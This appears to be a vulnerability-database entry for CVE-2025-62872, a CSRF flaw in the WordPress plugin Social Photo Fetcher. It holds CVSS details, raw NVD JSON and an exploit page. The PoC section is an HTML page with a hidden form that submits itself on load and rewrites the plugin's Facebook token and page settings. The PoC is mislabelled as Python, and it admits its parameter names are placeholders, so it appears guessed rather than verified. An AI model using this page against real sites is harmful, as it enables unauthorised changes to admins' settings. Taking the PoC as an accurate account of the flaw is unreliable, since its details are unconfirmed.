Security Vulnerability Report
中文
CVE-2025-62872 CVSS 4.3 MEDIUM

CVE-2025-62872

Published: 2025-12-09 16:18:04
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in JK Social Photo Fetcher facebook-photo-fetcher allows Cross Site Request Forgery.This issue affects Social Photo Fetcher: from n/a through <= 3.0.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Social Photo Fetcher (facebook-photo-fetcher) <= 3.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62872 --> <!-- Target: WordPress site with Social Photo Fetcher plugin <= 3.0.4 --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-62872</title> </head> <body> <h1>Social Photo Fetcher CSRF Vulnerability PoC</h1> <p>This PoC demonstrates the CSRF vulnerability in Social Photo Fetcher plugin.</p> <!-- Auto-submit form to trigger malicious action --> <form id="csrfForm" action="http://target-wordpress-site/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Replace with actual vulnerable parameter names --> <input type="hidden" name="action" value="social_photo_fetcher_settings"> <input type="hidden" name="facebook_token" value="malicious_token"> <input type="hidden" name="facebook_page_id" value="attacker_controlled_page"> <input type="hidden" name="submit" value="Save Changes"> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); // Log submission attempt console.log('CSRF PoC executed for CVE-2025-62872'); </script> <p>If successful, the attacker can modify plugin settings without the admin's knowledge.</p> <p>Note: This PoC is for educational and security testing purposes only.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62872", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:04.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in JK Social Photo Fetcher facebook-photo-fetcher allows Cross Site Request Forgery.This issue affects Social Photo Fetcher: from n/a through <= 3.0.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/facebook-photo-fetcher/vulnerability/wordpress-social-photo-fetcher-plugin-3-0-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}